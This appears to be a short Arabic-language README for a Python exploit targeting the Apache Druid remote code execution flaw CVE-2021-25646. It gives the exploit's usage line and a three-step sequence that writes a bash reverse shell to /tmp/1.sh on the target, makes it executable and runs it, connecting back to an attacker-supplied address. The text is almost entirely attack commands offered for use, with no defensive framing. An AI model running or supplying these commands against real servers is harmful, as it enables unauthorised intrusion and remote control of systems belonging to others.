
استغلال بلغة Python لثغرة تنفيذ التعليمات البرمجية عن بُعد في Apache Druid (CVE-2021-25646) مع قدرات شل عكسي وتنفيذ أوامر.
الاستخدام: python3 CVE-2021-25646.py -u http://x.x.x.x -c cmd
الريباوند شيل كما يلي:
كتابة سكريبت الريباوند شيل
python3 CVE-2021-25646.py -u http://x.x.x.x -c "echo 'bash -i >& /dev/tcp/x.x.x.x/xxxx 0>&1' > /tmp/1.sh"
منح صلاحية التنفيذ لسكريبت الشيل
python3 CVE-2021-25646.py -u http://x.x.x.x -c "chmod +x /tmp/1.sh"
تنفيذ الشيل
python3 CVE-2021-25646.py -u http://x.x.x.x -c "/bin/bash /tmp/1.sh"